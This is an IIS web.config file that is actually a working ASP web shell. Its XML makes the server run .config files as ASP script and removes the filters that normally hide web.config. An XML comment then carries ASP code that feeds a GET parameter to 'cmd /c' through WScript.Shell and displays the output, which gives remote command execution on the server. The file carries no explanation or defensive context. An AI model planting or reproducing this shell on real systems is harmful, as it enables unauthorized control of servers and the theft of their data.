<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!--
<% Response.write("-"&"->")%>
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)

    getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>

<head>
<style>
    pre {color:green;
        border: 5px solid;
        border-radius:10px;
        border-color:black;
        background-color:black;
        font-size: 20;}
    body {background-color:gray}
    input {background-color:black;
        color:red;
        width: 300px;}
    form {margin:0 auto;
        width:400px;}
</style>
</head>
<body>
<form action="" method="GET">
<input type="text" name="2X" size=45 value="<%= command %>">
</form>
<pre>
<% command = request("2X")
commandOutput = getCommandOutput("cmd /c" & command)
Response.Write(commandOutput)%>
</pre>
</body>
-->
